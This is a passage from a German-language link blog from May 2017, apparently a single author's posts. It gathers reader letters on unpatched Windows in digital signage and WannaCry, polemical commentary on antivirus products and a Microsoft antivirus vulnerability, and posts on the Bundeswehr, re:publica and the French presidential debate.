[l] Zu Alternativlos 39 kamen eine Menge Leserbriefe rein. Erstens, zum Update-Prozess von Windows:
MS hat seit dem letzten W10 update delta updates, sie nennen es UUP
blogs.windows.com
blogs.windows.com
Ein zweiter Leserbrief beschreibt die Situation im Digital Signage-Markt:
wenn ihr schon so nett fragt kann ich ja mal ein paar Zeilen schreiben da ich beruflich so ein System entwickelt habe. 2010 brauchte ich einen neuen Job und wurde über einen ehemaligen Kollegen angesprochen ob ich nicht für eine Firma die Digital Signage macht ein Internet basiertes System neu entwickeln will.
Das VB6 System das die Firma bis dahin bai knapp 1000 Kunden am laufen hatte war in die Jahre gekommen und etwas das über einen Browser von überall her steuern war dringend erforderlich.
Wie man sich sicher denken kann lief die alte Software auf Windows also sollte die neue Software auch darauf laufen - hier also schon mal der erste Grund warum Digital Signage auf Windows läuft - weil Version N-1 das getan hat. Hinzu kam das der technisch Verantwortliche (der die VB6 Version entwickelt hatte) darauf bestand verschiedene Teile der VB6 Version weiterzuverwenden (U.A. einen Laufschrift Generator der dank V-Sync seiner Meinung "Broadcastqualität" hatte).
Den Kontrollserver durfte ich glücklicherweise als Linux System bauen. Der Windows-teil in in C# geschrieben.
Seit 2010 hat sich einiges getan auch hardwaremäßig und ich hatte versucht seit 2012 oder so die Client PCs durch etwas sinnvolleres wie einen Raspberry pi oder ein geeignetes Android System zu ersetzen. Leider war dafür nie Zeit bzw. die günstigere Hardware war nie ein genügendes Argument um die knapp 2 Monate in eine neue Player Software zu investieren. (Hier also Grund 2 - "Warum es funktioniert doch").
2013 wurde die kleine Firma durch eine Größere gekauft. Der Kollege der die VB6 Software geschrieben hatte verstarb plötzlich und die Firma wurde praktisch komplett aufgelöst und alle Mitarbeiter einschließlich des Geschäftsführers entlassen. Der einzige verblieben Mitarbeiter bin ich. Das Produkt für Digital Signage in Apotheken wurde einer anderen Größeren Unterfirma mit 150 Mitarbeitern zugeteilt.
Meine neue Firma ist 100% Microsoft. Leute verwenden Windows 10 Handys hier. Ich denke das ist Grund 3 warum digital Signage auf Windows läuft - Die Funktionalität ist mittlerweile zu "klein" um das einzige Produkt einer Firma zu sein. Das heißt das diese Funktionalität als "Zugabe" zu anderer auf Windows basierter Software entwickelt wird. Und keine Firma die Windows Software baut verwendet dann Linux oder etwas anderes.
Damit ist allerdings auch die Zukunft klar - der Kontrollserver wird auf ein Windows System umgestellt. Ich denke ich werde mich nach einen neuen Job umschauen.
Die Frage "Warum ist bei DS Systemen das Update ausgestellt" hat auch ein paar Erklärungen- Digital Signage Systeme haben keine Benutzerinteraktion also fallen die häufigsten Infektionswege komplett weg - der Webbrowser und Email. Das macht es auch dank der Probleme in der jüngeren Vergangenheit mit durch WU installierte Popups (Windows 10 Nag und Office 356) einfach WU einfach auszuschalten weil wirklich die einzige Sicherheitslücke die das System überhaupt beeinträchtigen kann ein Remote Code Excecution Exploit ist - und die sind selten :/
Bei uns war WU standardmäßig angeschaltet. Es gab allerdings immer wieder kleinere Probleme mit den entsprechenden Blasen und Popups die manchmal hoch kamen - die Windows 10 Nagscreens und die Office 356 haben allerdings dafür gesorgt das Windows Update bei allen neuen PCs aus war.
Ein Dritter berichtet auch aus dem Signage-Markt:
Ich sehe das Nichtupdaten bei Anzeigetafeln und ähnlichem Bullshit (mir fallen Spontan einige Industriesteuerungen ein, die zwar unter Debian laufen, aber im Prinzip das gleiche Problem haben): Gut gemeintes Firewalling.
Diese Kisten erreichen alle anderen Kisten im LAN (müssen sie, denn ich muss die möglicherweise warten), aber nicht das Internet. Daraus folgt, dass die Dinger über die Existenz von Updates überhaupt nicht informiert sind! Jetzt reicht aber, dass eine blöde Kiste im LAN hängt und den Mist verbreitet und alle Kisten fallen um.
Ein ähnliches Problem betrifft Rechner, die (aus Sicherheitsgründen oder weil sie einfach nicht gebraucht werden), garnicht oft am Netz sind.
Ich bin im Übrigen ganz klar gegen Haftungsgeschichten, die haben nämlich schon den Schienenfahrzeugmarkt erfolgreich monopolisiert und zerstört.
Der nächste Beitrag ist kein Leserbrief aber passt gerade so schön…
Einen hab ich aber noch:
Ich arbeite in einer Organisation (stolz auf ihr HighTech-Image) in der die IT, dass volle Program der Schlangenbeschwörung durchzieht, das ihr skizziert habt. Patches testen bevor man sie ausrollt, kumulieren. Schlangenöl auf allen Rechnern, Internet über Proxy, Microsoft blacklisten für "pöse Websites" (da ist dann auch schon mal das nameserver-config-interface von Schlund gesperrt), you name it…
Es hat mich echt überrascht, dass ich bisher intern von einem wannacry-Befall nichts gehört habe.
Ich selbst war lange IT-Leiter in einer grösseren Unterabteilung, mit viel spezial Krams für Geräteansteuerung. So wie ihr das beschrieben habt, nur noch gruseliger.
Diese Lösungen sind oft in-house gestrickt von Leuten, die schon längst in Rente sind und die laufen eben. Und wenn man sie anfasst, fliegt es einem um die Ohren. Die stammen aus einer Zeit, wo es ausschliesslich darauf ankam, das etwas ans Laufen kam. programmiert haben das Leute, die ihre Gehversuche mit FORTRAN gemacht haben. Irgendwann haben sie sich C oder gar C++ beigebogen, aber immer noch Spaghetticode gemacht.
Wenn du das anfassen willst, musst du es von Grund auf neu machen. Also gehst du zu deinem Management und versuchst, ein Budget zu bekommen. Wenn du Glück hast, bist du in ein paar Jahren!!! so weit, dass du deine Kisten mal upgraden kannst. Meist kriegst du aber kein Budget. Und für Security gibt es ja Schlangenöl.
Wer entscheidet in Organisationen über die Bugjets? Das sind Leute, die sich für sehr wichtig halten und die fest daran glauben, was immer zu entscheiden ist, besser entscheiden zu können, als so ein Techie mit seinem schmalspurigen Blick auf die Welt. Das gilt für Produktionsanlagen und gilt erst recht für IT, denn der Manager hat ja daheim selbst einen PC und daher kennt er sich in IT besonders gut aus. Welche Erfahrungen haben diese Typen gemacht? Wenn man updates einspielt, geht danach irgentetwas nicht mehr. Das legt eine Teilaufgabe lahm, kostet Zeit und ist ärgerlich. Updates verändern die Applikation, so dass irgendetwas liebgewonnenes nun nicht mehr oder anders geht. Firmen nutzen Updates, um den Nutzer zu entmachten (die Digikam erkennt plötzlich den Akku aus dem Zubehör und spielt nur nach mit Originalakkus. Der Drucker verlangt nach HP-Patronen.) Kurzum, in ihrer Welt sind Updates von übel. Und das Internet war ehrlich gesagt bis dato nicht wirklich so gefährlich, oder? Mein damaliger Boss hatte nie einen Virus. Er war immerhin clever genug, nicht auf jeden Scheiss zu klicken. Und Backups hat er auch. Diese persönliche Erfahrung bestimmt weitesgehend seinen Managementstil. Also kriegst du kein Budjet, denn an anderen Stellen in der Bude brennt es viel dringender. (Z.B. braucht man Juristen, damit einem nix angeflickt wird oder so ….. jedenfalls keine Scheiss-Updates.)
Nun komme ich zu dem entscheidenden Punkt: Ihr habt das T-shirt mit der Aufschrift "told you so" erwähnt. Wenn du als kompetenter Manager im IT-Bereich auf Risiken hinweist, ist das so lang o.k., wie du nach einiger Quälerei überzeugen kannst und das Budjet zur Umsetzung einer Maßnahme bekommst. Es ist unerquicklich, wenn du dich nicht durchsetzen kannst und du mit dem Risiko weiter leben mußt, weil dir per Order die Hände gebunden sind. Am schlimmsten ist aber, wenn du recht behälst. Vermutlich kannst du, wenn die Katastrophe eintritt sogar noch einen "cover-my-ass-letter" aus denm guten alten Leitzordner ziehen. Das machst du einmal, vielleicht zweimal. Sowas vetragen Manager gar nicht. Ich bin kein IT-Leiter mehr. Zum Glück war für mich das Arbeitsrecht noch so hart, dass ich eine Weile gemütlich auf dem Abstellgleis verbringen durfte und in ein paar Monaten in Rente gehen werde.
Was wir verbreitet in allen Industrien haben, ist eine Managementkrise. Es ist nicht wirklich wichtig für die Zukunft zu denken. Wichtig ist, die Dinge so zu verwalten, dass man nicht persönlich zur Rechenschaft gezogen wird. Das was Gunther Dueck so treffend die anonymisierte Verantwortungslosigkeit nennt. Diese Art von Entscheidungkriterien betreffen auch die Securityfrage. Aber das war bisher eine winzige Baustelle im Vergleich zu anderen Ecken, wo mit dem Feuer gespielt wird.
Zurück zu wannacry. Das einzig wirklich neue ist die Erkenntnis, dass einem so ein Angriff potentiell so abschiessen könnte, dass man nicht mehr auf die Hufe kommt. Da ist er in der öffentlichen Warnehmung der erste Fall. (Falls er überhaupt so wargenommen werden wird. Was sind schon ein paar Krankenhäuser!)

Thu May 11 2017

[l] Leserbrief:
Frau von der Leyen hat ja aktuell ein paar Schwierigkeiten mit ihrer Truppe, hast du ja auch mitbekommen. Einer der neuen Skandale waren Funde von Wehrmachtsdevotionalien in Kasernenstuben in Donaueschingen und Illkirch. Jetzt wurde eine Durchsuchung aller Kasernen angeordnet, denn sowas geht ja nun gar nicht und ist bestimmt nur ein bedauerlicher Einzelfall.
Ich bin ja mal gespannt, ob sie etwas finden.
Das Bild stammt von der Hochstaufen-Kaserne in Bayern. Die hieß übrigens bis 2012 noch General Konrad-Kaserne. General Konrad war mit einer der übelsten Kriegsverbrecher und hat sich auf der Krim einen Namen gemacht.
Ich bin mir sicher, dass die alles finden werden. Die finden ja immer alles. Alles finden die.

Wed May 10 2017

[l] Ich weiß, ich weiß, auf re:publica-Bashing hat niemand mehr Bock. Ich hab das ja schon gemacht, bevor es cool war.
Aber das nur am Rande.
Bisher war das ja nur so ne belanglose Konferenz aus belanglosen Leuten, die sich gegenseitig versichern, sie seien gar nicht so belanglos, wie es aussieht. Man habe ja "Projekte" und so. Ein Startup, gelegentlich! Man müsse nur noch die Finanzierung klären, dann sei das Ding so gut wie in trockenen Tüchern!
Aber dieses Jahr … dieses Jahr war anders. Da haben sie Rubikon überschritten. Sie haben die Bundeswehr auf das Gelände gelassen. Die wollte einen Stand haben, um unter den minder~~bemitt~~jährigen Teilnehmern zu rekrutieren. Zur Überraschung der meisten Beobachter, mich eingeschlossen, war die Reaktion nicht, dass sie sofort aus dem Zimmer gelacht wurden. Nein. Die Orga der "Konferenz" hat da ernsthaft drüber nachgedacht. Es brauchte einen Aufschrei der Basis, um das in letzter Minute zu verhindern, hörte ich. Der Tagesspiegel behauptet:
Einerseits wollte man dem Militär keine Werbefläche bieten. Andererseits sahen die re:publica-Planer ein, dass auch die Bundeswehr fähige IT-Kräfte braucht. Zum Beispiel, um im Ernstfall Hackerangriffe gegen Atomkraftwerke abzuwehren.
Ich gebe euch mal eine Minute, damit ihr euch vom Schock erholen könnt.
Bereit? OK. Weiter.
Außerdem soll die Konferenz doch ein Ort der gesellschaftlichen Auseinandersetzung sein, keine Selbstvergewisserung Gleichgesinnter. Am Ende stellte sich heraus: Die interne Diskussion war überflüssig, sämtliche Standflächen bereits ausgebucht.
Wenn sich das für euch wie eine lahme Schutzbehauptung anhört, dann seid ihr nicht alleine.
Aber hey, Ende gut, alles gut. Dachte ich. Bis ich hörte, dass die Bundeswehr an einem Panel teilnehmen sollte. Nein, wirklich! Na, dachte ich mir, das wird bestimmt ein Blutbad (also im übertragenen Sinne, die werden denen schon am Eingang die Schusswaffen abgenommen haben). Da werden sicher gleich einige Leute zum Mikrofon rennen und ein paar … äh, sagen wir mal, pointierte Fragen stellen. Aber: Das hat die Moderatorin abgewürgt.
Die haben sich trotzdem noch um Kopf und Kragen geredet, klar. Und ganz konnte der Protest dann doch nicht verhindert werden.
Ich finde dennoch, dass das eine gute Abschiedsnote ist. Macht einfach nächstes Jahr keine Veranstaltung mehr. Die Blutflecken kriegt ihr eh nicht weg von eurem Ruf.
Update: Oh, es geht noch weiter! Das war ja gar nicht die re:publica, das war die "MediaConvention"! Oh ach so! Ja, äh, wie konnte diese Verwechslung nur geschehen? Vielleicht weil das zur gleichen Zeit am gleichen Ort stattfand, und es nicht mal eigene Tickets dafür gab, sondern man mit den re:publica-Tickets reinging? Die wollen, wenn ich das richtig verstehe, sagen, dass sie die Slots an 3. abgegeben haben, ohne sich Einflussmöglichkeiten zu sichern. Im deutschen Strafrecht ein klarer Fall von Störerhaftung!

Tue May 9 2017

[l] Meine sehr verehrten Damen und Herren, es gibt jetzt Details zu dem "worst Windows remote code exec in recent memory" von Tavis Ormandy. Ihr erinnert euch. "wormable". Das ist übrigens ein Wort, das m.W. Microsoft erfunden hat. "wormable" ist der Unterschied zwischen den Stufen high und critical. high ist schlimm, Aus critical kann man einen Wurm machen.
Meine Vermutung war ja, dass es SChannel ist. Das ist die TLS-Implementation von Microsoft, die sich im Vergleich zu allen anderen TLS-Implementationen auf dem Planeten verdammt gut geschlagen hat bisher. Zu gut, fand ich, und dachte mir, die sind jetzt dann wohl doch mal fällig gewesen.
Aber das war es nicht. Nein. Viel besser. Es war der Microsoft-Antivirus. Stellt sich nämlich raus: Der hat eine Scripting-Sprache, und die hat die selben Bugs, die auch andere Skripting-Sprachen von Microsoft plagen: Type Confusion.
Die Skripting-Sprache ist für Netzwerk-Überwachung. Das ist eigentlich eine gute Idee. Microsoft hat auch sowas ähnliches wie Wireshark im Angebot, und da ist auch fast die gesamte Decoding-Logik mit einer kleinen Mini-Beschreibungssprache erschlagen worden. Ergo hat das Ding so gut wie keine Security-Bugs, während Wireshark der Moloch zwischen Sodom und Gomorrah ist.
Aber ich weiche vom Thema ab. Microsoft hat einen Bug im Antivirus. Genau was ich seit Tagen auf der Heise Show als Szenario an die Wand gemalt habe. Und weil es eben Microsoft und kein gammeliger Schlangenöl-Hersteller ist, gibt es da jetzt keine Nebelbank sondern das wird als das bezeichnet, was ist es: Critical, Remote Code Execution, Wormable.
So und jetzt kann sich ja jeder nochmal selber überlegen, wie wahrscheinlich das ist, dass Microsoft mit ihren Milliarden an Ressourcen, mit ihren fünfstellig vielen Security-Experten, mit ihren monatelangen Testzykeln, dass DIE das nicht hinkriegen, aber die anderen kriegen es hin. Ja nee, klar.
Hier ist übrigens Microsofts Reaktion.

Sat May 6 2017

[l] Wie ist eigentlich der Schweizer Spion bei der deutschen Finanzaufsicht aufgeflogen?
Die Geschichte ist der Hammer.
Und zwar läuft in Deutschland ein Verfahren gegen Werner "Agentenlegende" Mauss, und der hat natürlich Akteneinsicht beantragt. In den Akten fand er auch Unterlagen der Schweizer. Und es stellt sich raus, dass da auch Aussagen von besagtem Spion zu seinen Geheimdiensttätigkeiten dabei waren, die er in der Schweiz (wo er selbst in U-Haft saß) gemacht hatte. Diese Aussagen hatte die Schweizer Staatsanwaltschaft treudoof an die deutschen Spionageopfer weitergereicht.
Einmal mit Profis arbeiten! (Danke, Thomas)
[l] Eine der besten Gelegenheiten für Fortbildung ist, aus Fehlern zu lernen. Besonders wichtig sind dabei Fehler, die andere gemacht haben, denn dann spart man sich den Schaden und geht direkt zum Lernen über. Daher ist es sehr wichtig, nach Problemen ein Port-Mortem zu schreiben und zu veröffentlichen.
Hier ist so ein Post Mortem, von einer Hipster-Bullshitbingo-Startup-Klitsche.
Nun wird vielleicht euer erster Instinkt sein, dass die halt Bullshitbingo-Tech verwenden, so Rethinkdb und Nodejs und so, das betrifft euch vielleicht gar nicht. Lest es trotzdem, und zwar ganz.
Update: Aus der libstdc++-Doku:
Notes about deallocation. This allocator does not explicitly release memory. Because of this, memory debugging programs like valgrind or purify may notice leaks: sorry about this inconvenience. Operating systems will reclaim allocated memory at program termination anyway.
Einer für die Geschichtsbücher. "This is why we can't have nice things", wie man so schön sagt.

Fri May 5 2017

[l] Ich muss ja sagen, dieses Gender-Mainstreaming, das ist ja ein Erfolgsmodell sondergleichen. Jetzt wo die Frauen endlich eigene Berufsbezeichnungen haben, stellt sich raus, dass wenn man beispielsweise bei Xing nach "Controller", "Berater" oder "Fotograf" sucht, der lauter Männer findet. Denn die Frauen haben sich unter "Controllerin" und "Fotografin" eingetragen. JA SUPER, liebe Frauen! Und daran sind jetzt natürlich auch wir fiesen Männer schuld, weil unser Patriarchat die Algorithmen von Xing vergiftet hat.
Gut gemacht, liebe Feministen. Weitermachen. Gestern standen wir vor dem Abgrund, heute sind wir einen Schritt weiter.
[l] Das hört ja gar nicht auf mit den Antiviren-Einsendungen! :-)
Hier ist noch eine besonders fiese, die den Blogpost von G-Data neulich mit ihren Werbeaussagen kontrastiert. Meine Leser haben da offensichtlich weniger Zurückhaltung als ich, auf einzelne Marktteilnehmer zu zeigen. Es gab auch eine Einsendung einer Firma, die in irgendeiner Spezialsoftware ausgerechnet VBScript zum Implementieren von Sonderwünschen nimmt. Das sei jetzt halt so und bliebe eben auch so, wenn die Geschäftsführung kein Geld in die Hand nimmt, da was anderes zu beschaffen. Und gerade G-Data, schreibt er, würde ihnen da regelmäßig die Funktionalität zerschießen. Ich bin mir sicher, dass das bei der Konkurrenz genau so ist. Aber er spricht auch noch ein anderes Problem an, das ich so noch nicht im Blog hatte, nämlich das bei so kurzen Updatezyklen und so einer dynamischen Plattform auch die Reproduzierbarkeit leidet und man beim Support im Wesentlichen seit Jahren mit "bei uns geht's" abgespeist wird und dann aber Ausfälle hat, wo 30 Leute nicht arbeiten können, weil das VBScript-Runtime in Karantäne geschoben wurde. Ich bin mir auch hier sicher, dass das bei anderen Anbietern genau so ist. Das sind schlicht Probleme der Prozesse hinter AV-Produkt-Herstellung, die nicht genug Zeit lassen, um menschliches oder maschinelles Versagen effektiv auszuschließen.
Update: Ein anderer Einsender kommentiert:
die Probleme hatte ich mit unserem TrendMicro-Schlangenöl auch schon. Ein kleines Tool in C# geschrieben, exe gebaut, einer Kollegin der Einfachheit halber per E-Mail geschickt. Ihr TrendMicro: Oh nein, eine exe! In einer E-Mail! Todesgefahr!!1! Ausführen durfte man die exe aber trotzdem.
Warum ich dir das schreibe?
Als ich die exe danach bei mir selbst ausführen wollte, hat sich MEIN TrendMicro auch dagegen gewehrt, weil diese Software offenbar nun auf irgendeiner Blacklist stand. Leute, ich habe das selbst kompiliert, und ich vertraue meinem Code. Das ist in TrendMicro aber offenbar gar nicht vorgesehen.
Selbst kleine Änderungen am Code und damit eine neue Binary haben TrendMicro nicht davon abgehalten, weiter Alarm zu schlagen. Mittlerweile ist aber Ruhe, ohne dass ich reproduzieren kann, was das alles ausgelöst hat.
Meine Theorie wäre, dass es eine Heuristik gibt, Programme grundsätzlich für schädlich zu halten, wenn ihr Hash noch nie irgendwo gesehen wurde. Das wäre jedenfalls eine grobschlächtige Haudrauf-Methode, um gegen Binär-Obfuskatoren vorzugehen. Aber ich habe da keine Einsichten, nur eine Vermutung.
Update: Ein anderer Einsender hat eine bemerkenswerte Beobachtung gemacht:
Vor ca. 15 Jahren mußten wir eine Auflage bei Großkunden erfüllen. Also alles, was wir ablieferten, mußte mit dem xyz Virenscanner geprüft sein.
Sei's drum.
Hatte zum Glück nie irgendwelche Probleme (bzw. kamen die nie an die Oberfläche).
Komisch nur:
Immer wenn das jeweilige Abonnement des xyz Virenscanners zur Erneuerung anstand, gab es regelmäßig Virenalarm auf unseren Rechnern. Ich sage nicht, dass man uns da tatsächlich etwas angetan hat, aber so eine "verkaufsfördernde Maßnahme" scheint das wohl zu jener Zeit gewesen zu sein.
Das war bei Peter und John gleich, ohne jetzt Produkte direkt zu nennen.
Krass. Könnt ihr das bestätigen?

Thu May 4 2017

[l] Das TV-Duell zwischen Marine le Pen und Emmanuel Macron lief wohl recht aggressiv ab. Wenn man die Berichterstattung beim ehemaligen Nachrichtenmagazin liest, klingt das, als würde der erfahrene Staatsmann Macron von der Gossen-Schlampe Le Pen von der Seite blöd angemacht. Ich zitiere mal:
Die FN-Kandidatin ist von der ersten Sekunde an auf Krawall aus. "Welchen Eindruck haben Sie von der Kampagne?" Sie antwortet reflexartig mit einer giftigen Tirade: "Herr Macron ist der Kandidat der unkontrollierten Globalisierung", so Le Pen, "der Kandidat der Prekarität, der sozialen Brutalität, eines Krieges jeder gegen jeden, der ökonomischen Verwüstungen durch die Großunternehmen, der Zerlegung Frankreichs durch die großen Wirtschaftsinteressen."
So und jetzt kommt mal bitte kurz mit zur Wikipedia-Seite über Macron. Sohn von zwei Ärzten, Vater Professor, Schulbildung am Elitegymnasium, Studium an Elite-Kaderschmiede Sciences-Po, schrieb eine Magisterarbeit über Machiavelli (kannste dir gar nicht ausdenken!), danach an der anderen Elite-Kaderschmiede ENA. Und natürlich, wie bei so Eliten-Zirkeln üblich, direkt einen gutbezahlten Elitenjob in der Verwaltung gekriegt, zum Finanzministerium gegangen, und dann als Investmentbanker Kasse gemacht.
Was ich damit sagen will: Die Kritik von Le Pen ist inhaltlich völlig korrekt. Macron ist der Kandidat der Eliten. Wer an sozialer Gerechtigkeit Interesse hat, wird nicht Investmentbanker.
Aber, äh, komisch, diese Details findet das ehemalige Nachrichtenmagazin gar nicht berichtenswert! Stattdessen so neutrale Faktenberichterstattung wie wie
Fortan läuft die Konfrontation polemisch, hässlich, bisweilen verlieren sich die Argumente in lautstarkem Radau: Le Pen geht es um die Diskreditierung ihres Gegners, Macron versucht sich in Polit-Pädagogik und rationaler Analyse. Die FN-Chefin macht ihren Kontrahenten für alle Übel der Republik verantwortlich und tituliert ihn als "kaltherzigen Banker", als "Liebling des Systems", "Favorit der Medien" und "Handlanger der Eliten".
Ich mag die Le Pen auch nicht und wünsche ihrer Ideologie und Partei den Untergang. Aber was der Spiegel da macht, das ist nicht satisfaktionsfähig.
Update: Ein Einsender kommentiert, dass pikanterweise auch Marine Le Pen ein Eliten-Kind ist, und nicht mal ihr Vater das Vermögen erarbeitet hat, sondern das ist über Generationen vererbt. Sie ist auch an typischen Elite-Einrichtungen ausgebildet worden, und gegen sie ist dieser Vorwurf sogar noch prägnanter als gegen Macron. Nur ging es mir in diesem Beitrag nicht darum, wer da jetzt elitärer ist, sondern dass die Medien eigentlich die Aufgabe haben, solche Vorwürfe, speziell in einer Wahlkampfdebatte, zu prüfen und Fakten zu liefern. Das hat hier nicht stattgefunden. Und wieso Macron nicht gegen Le Pen den großen "du bist auch elitär"-Hammer rausgeholt hat, das wundert mich ehrlich gesagt auch.
Update: Einsender weisen mich gerade auf zwei Dinge hin. Erstens: Macron wirft Le Pen ihre Herkunft anscheinend doch häufiger vor, mit so Floskeln wie dass er ja nicht auf einem Schloss geboren sei. Und Zweitens ist der Job, den Macron in der Verwaltung abgegriffen hat, eine Pflicht für Absolventen der ENA ist. Da müssen alle durch, und das wird wohl eher als nervige Pflicht gesehen als als cooler Bonus.

Wed May 3 2017

[l] Mein Eindruck ist, dass wir bei der Antiviren-sind-Schlangenöl-Debatte inzwischen die grüne Wiese der Grundlagen verlassen haben, und langsam mit den inhaltlichen Punkten weitermachen können. Ich will bei der G-Data-Entgegnung jetzt nicht endlos auf Details herumreiten, aber mir sind ein paar Punkte wichtig. Die Mär des umfassenden Schutzes wird ja schon durch mein Beispiel mit dem weihnachtlichen Aufräumen des Familien-PCs entkräftet. Da muss ich gar nichts groß erzählen, das hat fast jeder schon mal persönlich erlebt. Selbst wenn das listig auf "a) bekannte und b) weit verbreitete Angriffe von Schadprogrammen" eingeschränkt wird. Ich denke nicht, dass hier ernsthaft jemand behaupten wird, der Familien-PC sei im Allgemeinen von exotischen APT-Varianten infiziert. Nein. Das ist genau der triviale Basis-Malware-Sumpf, vor dem Antiviren zu schützen vorgeben, den man da findet. Daher bleibe ich bei meiner These: Antiviren helfen nicht.
G-Data stimmt mir grundsätzlich zu, dass Zahlen zur Wirksamkeit von Antiviren schwierig zu beschaffen sind, weil die im Allgemeinen von den Herstellern kommen und daher nicht als neutral gelten können. Die Zahlen, die eine große Bibliothek an Malware gegen Antiviren werfen, finden häufig hunderte von Viren, die nicht gefunden wurden, und die Antivirenhersteller reden sich dann mit angeblicher Praxisferne der Tests heraus. Ich las neulich von einer Studie, bei der eine Uni alle ihre einkommenden die Malware-Mail-Attachments bei Virustotal hochgeladen hat und auf unter 25% Erkennungsrate kam. Leider finde ich die URL nicht mehr. Vielleicht kann da ja ein Leser helfen. Mein Punkt ist aber unabhängig davon, ob das jetzt 5%, 25% oder 90% Erkennungsrate sind. Es reicht, wenn ein Virus durchkommt. Eine Malware ist nicht wie die Windpocken. Wenn man sie kriegt hat man halt rote Pünktchen im Gesicht und nach ner Woche ist wieder alles OK. Nein. Eine Infektion reicht, um die gesamten Daten zu klauen, die Platte zu verschlüsseln, und an einem DDoS-Botnet teilzunehmen. Die Erkennungsrate ist, solange sie nicht 100% ist, irrelevant. Ich bin immer wieder schockiert, mit welcher Selbstverständlichkeit Leute nach einer Malware-Infektion halt "desinfizieren" klicken in irgendeinem Tool und dann weitermachen, als sei nichts gewesen. Das ist wie wenn jemand in eine Schwimmbecken scheißt, und man fischt den größten Klumpen raus, und dann schwimmen alle weiter. WTF!?
Der nächste Talking Point der AV-Industrie ist (angesichts der miserablen Erkennungsraten in der Praxis), dass man ja nicht mehr rein reaktiv arbeite sondern auch magischen Einhorn-Glitter aus der Cloud habe. Erinnert ihr euch noch an den Aufschrei nach Windows 10, als Microsoft sich das erstmals explizit von euch absegnen ließ, dass sie eure Daten in die Cloud hochladen? Wie jetzt?! Die wollen gerne als Debugginggründen sehen, welche crashenden Programme ich ausführe!? DAS GEHT JA MAL GAR NICHT!!1! Ja was denkt ihr denn, was das ist, was die AV-Industrie mit der Cloud macht? Die werden im Allgemeinen nur die Hashes der Software hochladen, aber das heißt trotzdem, dass die sehen können, wer alles Winzip benutzt, oder dieses eine hochpeinliche aus Japan importierte Hentai-"Dating-Simulator"-Anwendung. Aber DENEN traut ihr?!
Ich sage euch jetzt mal aus meiner Erfahrung, dass die Analyse von einem Stück Software Wochen dauert, besonders wenn die Software gerne nicht analysiert werden möchte. Wenn die AV-Industrie also so tut, als könnte ihre magische Cloud "innerhalb von Sekunden" helfen, dann gibt es nur zwei Möglichkeiten: Entweder sie haben ein paar Wochen gebraucht und tun jetzt nur so, als sei die paar Wochen lang schon niemand infiziert worden. Oder sie haben da irgendwelche Abkürzungen genommen. Überlegt euch mal selbst, wieviel Verzögerung eurer Meinung nach akzeptabel wäre. Dann, wieviel Arbeit das wohl ist, anhand einer Binärdatei Aussagen zu machen. Zumal man solche Aussagen im Allgemeinen in einer VM macht, und Malware im Allgemeinen guckt, ob sie in einer VM läuft und dann die bösen Funktionen weglässt. Eine denkbare Abkürzung wäre also, schon so einen Check als Zeichen für Malware zu deuten. Da sind wir aber nicht mehr in der Branche der seriösen Bedrohungsabwehr, sondern in der Branche der Bachblüten-Auraleser-Homöopathen, das ist hoffentlich jedem klar.
Das ganze Gefasel mit proaktiven Komponenten halte ich auch für eine Nebelkerze. Wenn das funktionieren würde, gäbe es Weihnachten keine wegzuräumende Malware auf dem Familien-PC, und in der Presse wäre nie von Ransomware die Rede gewesen, weil das schlicht niemanden betroffen hätte.
Ja und wie ist es mit dem Exploit-Schutz? Das ist Bullshit. Das erkennt man schon daran, dass Microsoft diese angeblichen Wunderverfahren der AV-Industrie nicht standardmäßig ins System einbaut. Googelt das mal. Microsoft hat hunderttausende von Dollars für gute Exploit-Verhinder-Ideen ausgeschrieben und ausgezahlt. Und wieviele Prämien für gute Ideen findet ihr von der AV-Branche? Na seht ihr.
Überhaupt. Kommen wir mal zu den Standards. Microsoft hat den Prozess etabliert, den gerade alle großen Player kopieren, die SDL. Ich weiß das, weil ich dabei war, als sie das bei sich ausgerollt haben. Microsoft hat, was ich so gehört habe, sechsstellig viele CPU-Kerne, die 24/7 Fuzzing gegen ihre Software-Komponenten fahren, um Lücken zu finden. Microsoft hat ganze Gebäude voller Security-Leute. Ich würde schätzen, dass Microsoft mehr Security-Leute hat, als die typische AV-Bude Mitarbeiter. Microsoft hat geforscht, ob man mit dem Umstieg auf .NET Speicherfehler loswerden kann, ob man vielleicht einen ganzen Kernel in .NET schreiben kann. Sie hatten zu Hochzeiten über 1/4 der Belegschaft Tester. Es gibt periodische Code Audits von internen und externen Experten. Sie betreiben eine eigene Security-Konferenz, um ihre Leute zu schulen, die Bluehat. Aus meiner Sicht stellt sich also die Frage: Wenn DAS die Baseline ist, trotz derer wir immer noch ein Sicherheitsproblem haben, dann müssten ja die AV-Hersteller nicht nur genau so gut sondern deutlich besser sein. Sonst wären sie ja Teil des Problems und nicht Teil der Lösung. Das hätte ich gerne mal von den AV-Leuten dargelegt, wieso sie glauben, sie könnten das besser als Microsoft.
Oh und einen noch, am Rande:
Wenn Daten signiert sind ist klar, von wem die Informationen stammen. Oft ist es schon ein beträchtlicher Sicherheitsgewinn, wenn man weiß, dass die Information von einem bekannten und ergo vertrauenswürdigen Quelle stammen.
Das ist natürlich Bullshit. Es sind schon diverse Malware-Teile mit validen Signaturen gefunden worden, und alle alten Versionen mit bekannten Sicherheitslücken sind ja auch noch gültig signiert. Code Signing dient nicht dem Schutz des Kunden sondern dem Schutz von Geschäftsmodellen.
Mir ist außerdem wichtig, dass ihr merkt, wenn ihr hier mit einer bestimmten Haltung an das Thema rangeht, weil ihr selbst schon entschieden habt, und jetzt nur noch die Argumente rauspickt und höher bewertet, die eure getätigte Entscheidung bestätigen. Das ist ein sehr menschliches und normales Verhalten, aber dem Erkenntnisgewinn dient das nicht. Wo kommen denn die Zahlen her, dass angeblich noch niemand über Lücken in Antiviren gehackt wurde? Wenn ihr zu Weihnachten 10 Viren findet — macht ihr dann erstmal eine wochenlange forensische Analyse, wo die herkamen? Nein, macht ihr nicht! Ihr seid froh, wenn die weg sind. Aussagen wie "noch keiner ist über seinen Antivirus gehackt worden" sind unseriös, und Aussagen wie "es sind keine Fälle bekannt" sind irreführend und Nebelkerzen.
Update: Wer übrigens die Früchte von Microsofts Exploits-Schwieriger-Machen haben will, der muss a) immer schön Windows updaten; weg mit Windows 7 und her mit Windows 10, und/oder b) EMET installieren.
Update: Hups, EMET-Link war kaputt.
Update: Ein Einsender weist darauf hin, dass es doch mal einen Fall von einer massenhaftung Malware-Verbreitung via Antivirus-Sicherheitslücke gab.
Update: Ein fieser Wadenbeißer hat sich mal durch die Archive gegraben:
es gibt noch weiteres Argument gegen die Schlangenöl-Branche, das ich glaube ich bei dir noch nicht gelesen habe, wenngleich das eher nicht gegen die Microsoft-Lösung zielt:
